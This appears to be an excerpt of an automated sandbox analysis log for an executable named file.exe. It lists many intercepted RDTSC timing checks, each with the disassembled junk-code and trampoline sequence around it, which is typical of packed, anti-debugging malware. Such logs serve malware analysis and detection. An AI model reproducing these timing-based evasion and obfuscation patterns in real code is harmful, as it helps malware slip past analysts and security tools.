Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CDDF9 second address: 17CDE1C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8078BD3388h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F8078BD3392h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D4CB9 second address: 17D4CBF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D4CBF second address: 17D4CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D4CC5 second address: 17D4D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F80798BCE5Fh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F80798BCE58h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov di, si 0x0000002c push 00000000h 0x0000002e call 00007F80798BCE5Eh 0x00000033 add ebx, 51989810h 0x00000039 pop edi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F80798BCE58h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 0000001Bh 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 mov ebx, edi 0x00000058 xchg eax, esi 0x00000059 jo 00007F80798BCE64h 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D4D46 second address: 17D4D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D6D2E second address: 17D6D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80798BCE60h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D6D42 second address: 17D6D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D6D46 second address: 17D6D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F80798BCE66h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D6D69 second address: 17D6DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8078BD3386h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D1803h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F8078BD3388h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f movzx ebx, si 0x00000032 push 00000000h 0x00000034 stc 0x00000035 xchg eax, esi 0x00000036 push esi 0x00000037 pushad 0x00000038 jnp 00007F8078BD3386h 0x0000003e jmp 00007F8078BD3395h 0x00000043 popad 0x00000044 pop esi 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jne 00007F8078BD338Ch 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D6DD4 second address: 17D6DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80798BCE63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D6DEB second address: 17D6DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CE674 second address: 17CE69A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b js 00007F80798BCE58h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D30C2 second address: 17D30C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D4FB0 second address: 17D4FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D7D17 second address: 17D7D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D30C8 second address: 17D30EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F80798BCE68h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D8E84 second address: 17D8EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F8078BD3388h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D3812h], ebx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F8078BD3388h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 adc edi, 2C844F2Eh 0x0000004a push 00000000h 0x0000004c mov edi, dword ptr [ebp+122D2370h] 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F8078BD3390h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D7F47 second address: 17D7F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D8EF1 second address: 17D8F05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8078BD3390h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D7F4B second address: 17D7F4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D8F05 second address: 17D8F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D7F4F second address: 17D8004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jno 00007F80798BCE5Eh 0x0000000e nop 0x0000000f or dword ptr [ebp+122D20ADh], edx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov edi, eax 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 sub dword ptr [ebp+122D180Dh], eax 0x0000002b mov bl, 78h 0x0000002d mov eax, dword ptr [ebp+122D0459h] 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F80798BCE58h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov edi, dword ptr [ebp+122D386Ch] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebp 0x00000058 call 00007F80798BCE58h 0x0000005d pop ebp 0x0000005e mov dword ptr [esp+04h], ebp 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc ebp 0x0000006b push ebp 0x0000006c ret 0x0000006d pop ebp 0x0000006e ret 0x0000006f jne 00007F80798BCE6Fh 0x00000075 ja 00007F80798BCE5Ch 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D8004 second address: 17D8008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D8008 second address: 17D800E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D800E second address: 17D8014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D9071 second address: 17D9075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DADF2 second address: 17DAE65 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8078BD3386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f sbb ebx, 0A490ECEh 0x00000015 mov bh, 9Ah 0x00000017 popad 0x00000018 sub ebx, dword ptr [ebp+122D2A88h] 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 push ebx 0x00000022 call 00007F8078BD3390h 0x00000027 pop edi 0x00000028 pop edi 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F8078BD3388h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F8078BD3391h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D9108 second address: 17D910D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DAE65 second address: 17DAE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DBDFA second address: 17DBDFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DBDFE second address: 17DBE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DCE69 second address: 17DCE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DEEB4 second address: 17DEEB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DC0B2 second address: 17DC0BC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F80798BCE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DFF66 second address: 17DFFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push ebx 0x00000008 jns 00007F8078BD338Ch 0x0000000e ja 00007F8078BD3386h 0x00000014 pop ebx 0x00000015 nop 0x00000016 jmp 00007F8078BD3390h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F8078BD3388h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D38AEh], eax 0x0000003f jmp 00007F8078BD3396h 0x00000044 xchg eax, esi 0x00000045 pushad 0x00000046 jmp 00007F8078BD3391h 0x0000004b push edi 0x0000004c jg 00007F8078BD3386h 0x00000052 pop edi 0x00000053 popad 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DFFF1 second address: 17DFFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DFFF5 second address: 17DFFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DFFF9 second address: 17DFFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DAFEE second address: 17DB0A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8078BD3386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F8078BD338Ah 0x00000013 mov edi, dword ptr [ebp+122D29B8h] 0x00000019 pop ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov edi, dword ptr [ebp+122D1808h] 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e mov bx, FB2Dh 0x00000032 mov eax, dword ptr [ebp+122D08B9h] 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F8078BD3388h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov ebx, 6BCF6836h 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push esi 0x0000005c call 00007F8078BD3388h 0x00000061 pop esi 0x00000062 mov dword ptr [esp+04h], esi 0x00000066 add dword ptr [esp+04h], 00000015h 0x0000006e inc esi 0x0000006f push esi 0x00000070 ret 0x00000071 pop esi 0x00000072 ret 0x00000073 mov ebx, dword ptr [ebp+122D2C18h] 0x00000079 nop 0x0000007a pushad 0x0000007b ja 00007F8078BD3388h 0x00000081 jmp 00007F8078BD3391h 0x00000086 popad 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007F8078BD3395h 0x0000008f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DE0AC second address: 17DE0B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DE0B0 second address: 17DE12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8078BD338Dh 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D20ADh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a sub dword ptr [ebp+122D2C7Eh], edi 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007F8078BD3388h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 jnp 00007F8078BD338Ch 0x00000047 mov edi, dword ptr [ebp+122D2BD4h] 0x0000004d xor bx, EFCEh 0x00000052 mov eax, dword ptr [ebp+122D0AFDh] 0x00000058 mov edi, dword ptr [ebp+1249110Ch] 0x0000005e push FFFFFFFFh 0x00000060 sbb bl, 00000062h 0x00000063 mov dword ptr [ebp+122D3389h], edi 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DE12F second address: 17DE133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DE133 second address: 17DE142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17DE142 second address: 17DE147 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E0182 second address: 17E019F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8078BD3390h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E019F second address: 17E01A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E2091 second address: 17E20AC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8078BD3388h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F8078BD3394h 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F8078BD3386h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E9C43 second address: 17E9C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E9C50 second address: 17E9C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E9C54 second address: 17E9C5A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E9C5A second address: 17E9C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E9C62 second address: 17E9C7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F80798BCE5Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E9C7A second address: 17E9C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17E9C80 second address: 17E9C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED7C8 second address: 17ED7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED7CE second address: 17ED7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED7D7 second address: 17ED7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED7DB second address: 17ED7FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F80798BCE58h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED7FE second address: 17ED840 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F8078BD3396h 0x00000011 mov eax, dword ptr [eax] 0x00000013 js 00007F8078BD3395h 0x00000019 jmp 00007F8078BD338Fh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED840 second address: 17ED844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED940 second address: 17ED945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED945 second address: 17ED94A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED94A second address: 17ED965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8078BD3386h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jbe 00007F8078BD3390h 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17ED965 second address: 17ED982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F80798BCE63h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F3B2C second address: 17F3B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8078BD3399h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F3B49 second address: 17F3B53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F3B53 second address: 17F3B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F8078BD3386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F42CE second address: 17F42E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F80798BCE5Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F46DA second address: 17F470E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jg 00007F8078BD338Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jng 00007F8078BD338Eh 0x00000016 jg 00007F8078BD338Eh 0x0000001c pushad 0x0000001d popad 0x0000001e jp 00007F8078BD3386h 0x00000024 push eax 0x00000025 push edx 0x00000026 jbe 00007F8078BD3386h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CFBAB second address: 17AFF6C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F80798BCE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F80798BCE58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jmp 00007F80798BCE5Fh 0x0000002b call dword ptr [ebp+122D37CCh] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push esi 0x00000035 pop esi 0x00000036 jng 00007F80798BCE56h 0x0000003c pushad 0x0000003d popad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CFCA8 second address: 17CFCD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3396h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F8078BD338Ch 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0150 second address: 17D0156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
